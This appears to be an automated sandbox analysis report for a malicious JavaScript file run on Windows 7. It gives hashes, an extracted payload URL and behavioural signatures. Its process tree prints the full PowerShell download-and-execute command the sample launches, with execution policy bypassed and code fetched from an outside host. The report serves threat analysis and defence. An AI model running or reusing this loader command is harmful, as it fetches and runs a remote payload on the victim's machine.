Analysis
-
max time kernel
120s -
max time network
138s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
05-03-2024 02:56
Static task
static1
Behavioral task
behavioral1
Sample
f6f462ce3420721369633b2feccd18c7d3c0f228629b671c398b675f0eb37e1b.js
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
f6f462ce3420721369633b2feccd18c7d3c0f228629b671c398b675f0eb37e1b.js
Resource
win10v2004-20240226-en
General
-
Target
f6f462ce3420721369633b2feccd18c7d3c0f228629b671c398b675f0eb37e1b.js
-
Size
65KB
-
MD5
ba20b18214a0fa85b9550a3c3b1fa357
-
SHA1
9b09c256f2373a17e4d612af88f5e3889716ba8d
-
SHA256
f6f462ce3420721369633b2feccd18c7d3c0f228629b671c398b675f0eb37e1b
-
SHA512
17e8ac3f8f1666935249e389d60f32036a375f663b9eff7c2c7b31f0fa287d0ee9d2d6869880051b0efd29f717de537eea99bee95ebe2c255501fe112024b150
-
SSDEEP
1536:eA/QaaX7EVdd2kw8ZTeo+PUtCbCgVxAop6yYFBgnJ1A:em9q7EVdd+8lWgxBop6y22bA
Malware Config
Extracted
https://compactgrill.hu/care.txt
Signatures
-
Blocklisted process makes network request 2 IoCs
flow pid Process 3 2488 powershell.exe 4 2488 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2488 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2488 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 2708 wrote to memory of 2488 2708 wscript.exe 28 PID 2708 wrote to memory of 2488 2708 wscript.exe 28 PID 2708 wrote to memory of 2488 2708 wscript.exe 28
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\f6f462ce3420721369633b2feccd18c7d3c0f228629b671c398b675f0eb37e1b.js1⤵
- Suspicious use of WriteProcessMemory
PID:2708 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-Expression (New-Object Net.WebClient).DownloadString('https://compactgrill.hu/care.txt')"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2488
-